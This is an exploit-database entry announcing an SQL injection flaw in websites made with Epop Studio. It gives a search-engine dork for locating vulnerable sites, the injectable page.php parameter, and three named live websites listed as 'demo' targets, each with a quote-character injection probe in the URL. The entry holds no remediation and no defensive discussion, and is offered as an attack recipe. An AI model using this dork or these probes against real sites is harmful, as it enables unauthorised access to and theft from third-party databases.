id: 19519
date: 10/05/2012
title: Epop Studio sql injection Vulnerability
author: The Black Devils
cves: 

# Exploit Title: Epop Studio  sql injection Vulnerability
# Date: 05/10/2012
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Software Link: http://epopstudio.com/
# Category : [ webapps ]
# Dork : Site By Epop Studio inurl:page.php?pid=
# Type : php
# Tested on: [Windows] & [Ubuntu]

-------------------------------

http:\Localhost\page.php?PageId= sql injection
-------------------------------
# Demo site:
http://www.florencefreedom.com/page.php?pID='476
http://www.953wiki.com/page.php?pID='30
http://www.aftonalps.com/page.php?pID='9

#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------

Mohamed Rassoul Allah



#  0day.today [2023-03-22]  #